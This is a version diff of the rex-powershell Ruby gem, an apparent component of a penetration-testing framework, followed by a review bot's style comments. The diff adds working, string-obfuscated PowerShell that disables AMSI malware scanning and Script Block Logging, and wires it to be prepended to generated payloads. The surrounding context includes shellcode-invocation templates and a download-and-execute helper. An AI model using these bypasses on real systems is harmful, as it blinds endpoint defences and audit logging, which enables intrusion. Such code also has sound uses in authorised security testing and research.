rex-powershell 0.1.81 → 0.1.82

checksums.yaml CHANGED
@@ -1,7 +1,7 @@
1
1
  ---
2
2
  SHA1:
3
- metadata.gz: 52aa59edea1a94ba2fc19092005bab64aeac69ea
4
- data.tar.gz: 7d565ada14c7580f8848dca04d4966dc2b666191
3
+ metadata.gz: 5050ad40885d40a43ab8756d73c94880b17d7666
4
+ data.tar.gz: 9a4d35a597ab6a991f2be28a403d216e733a124e
5
5
  SHA512:
6
- metadata.gz: da9f7797acb625600d51a28044d700043d7a219c12f60a289c9b7c312cab5e6852169058bcc06e70fd450c379ad98196800a7c6690cdba579267dc19e175ebfa
7
- data.tar.gz: 6d6b7ecc58698b0fcb39a765b15926dfca6dbfa33e398148faffb9d71a122079f24ed613c6821f26981f2802e74bf2edf3c2bac8631e2ad5c81f9ed682dbf6bf
6
+ metadata.gz: 03c15cfbddd8dc75c2f55e411285798911c9f286c50288412b1a51971036056f311c89e1099be7ea1dd4607139479099e7dd56e181fe6ee0de82ff158cec447a
7
+ data.tar.gz: 9dd8103e33b749ef55907ae5cc216e12814352480713056ea2fac2befbcd6630ddd096cd0cb3e18a0b6825c4bb6e8861a1566be2de1c2ce1757544781bdd2f78
Binary file
data.tar.gz.sig CHANGED
Binary file
@@ -64,4 +64,4 @@ $%{var_args}[2] = $%{var_sc}.Length
64
64
 
65
65
  $%{var_src_meth}.Invoke($null, $%{var_args})
66
66
 
67
- $%{var_tgt_meth}.Invoke($null, @(0x11112222))
67
+ $%{var_tgt_meth}.Invoke($null, @(0x11112222))
@@ -316,6 +316,10 @@ EOS
316
316
  end
317
317
  end
318
318
 
319
+ if opts[:prepend_protections_bypass]
320
+ psh_payload = Rex::Powershell::PshMethods.bypass_powershell_protections << ";#{psh_payload}"
321
+ end
322
+
319
323
  compressed_payload = compress_script(psh_payload, nil, opts)
320
324
  encoded_payload = encode_script(psh_payload, opts)
321
325
 
@@ -85,6 +85,53 @@ module Powershell
85
85
  '[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};'
86
86
  end
87
87
 
88
+ #
89
+ # Return mattifestation's AMSI bypass
90
+ #
91
+ # @return [String] PowerShell code to bypass AMSI
92
+ def self.bypass_amsi()
93
+ %q{
94
+ $Ref=[Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils');
95
+ $Ref.GetField('amsiIn'+'itFailed','NonPublic,Static').SetValue($null,$true);
96
+ }
97
+ end
98
+
99
+ #
100
+ # Return cobbr's Script Block Logging bypass
101
+ #
102
+ # @return [String] PowerShell code to bypass Script Block Logging
103
+ def self.bypass_script_log()
104
+ %q{
105
+ $GPF=[ref].Assembly.GetType('System.Management.Automation.Utils').GetField('cachedGroupPolicySettings','N'+'onPublic,Static');
106
+ If($GPF){
107
+ $GPC=$GPF.GetValue($null);
108
+ If($GPC['ScriptB'+'lockLogging']){
109
+ $GPC['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;
110
+ $GPC['ScriptB'+'lockLogging']['EnableScriptB'+'lockInvocationLogging']=0
111
+ }
112
+ $val=[Collections.Generic.Dictionary[string,System.Object]]::new();
113
+ $val.Add('EnableScriptB'+'lockLogging',0);
114
+ $val.Add('EnableScriptB'+'lockInvocationLogging',0);
115
+ $GPC['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptB'+'lockLogging']=$val
116
+ } Else {
117
+ [ScriptBlock].GetField('signatures','N'+'onPublic,Static').SetValue($null,(New-Object Collections.Generic.HashSet[string]))
118
+ }
119
+ }
120
+ end
121
+
122
+ #
123
+ # Return all bypasses checking if PowerShell version > 3
124
+ #
125
+ # @return [String] PowerShell code to disable PowerShell Built-In Protections
126
+ def self.bypass_powershell_protections()
127
+ %Q{
128
+ If($PSVersionTable.PSVersion.Major -ge 3){
129
+ #{self.bypass_script_log}
130
+ #{self.bypass_amsi}
131
+ }
132
+ }
133
+ end
134
+
88
135
  #
89
136
  # Download and execute string via HTTP
90
137
  #
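Review bot: The comment at line 123 says "checking if PowerShell version > 3", but the generated guard at line 128 is `-ge 3`, i.e. major version 3 or later; change the comment to `# Return all bypasses, guarded on PowerShell major version >= 3` so the doc matches the emitted condition. As a point of style, the three definitions at lines 92, 103 and 126 use empty parentheses (`def self.bypass_amsi()`), which is non-idiomatic Ruby and differs from the surrounding helpers; `def self.bypass_amsi` suffices. The enclosing module (the `module Powershell` context in the hunk header, and presumably `PshMethods`, given the call site elsewhere in this release) opens and closes outside this hunk.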
@@ -1,5 +1,5 @@
1
1
  module Rex
2
2
  module Powershell
3
- VERSION = "0.1.81"
3
+ VERSION = "0.1.82"
4
4
  end
5
5
  end
metadata CHANGED
@@ -1,7 +1,7 @@
1
1
  --- !ruby/object:Gem::Specification
2
2
  name: rex-powershell
3
3
  version: !ruby/object:Gem::Version
4
- version: 0.1.81
4
+ version: 0.1.82
5
5
  platform: ruby
6
6
  authors:
7
7
  - David 'thelightcosine' Maloney
metadata.gz.sig CHANGED
Binary file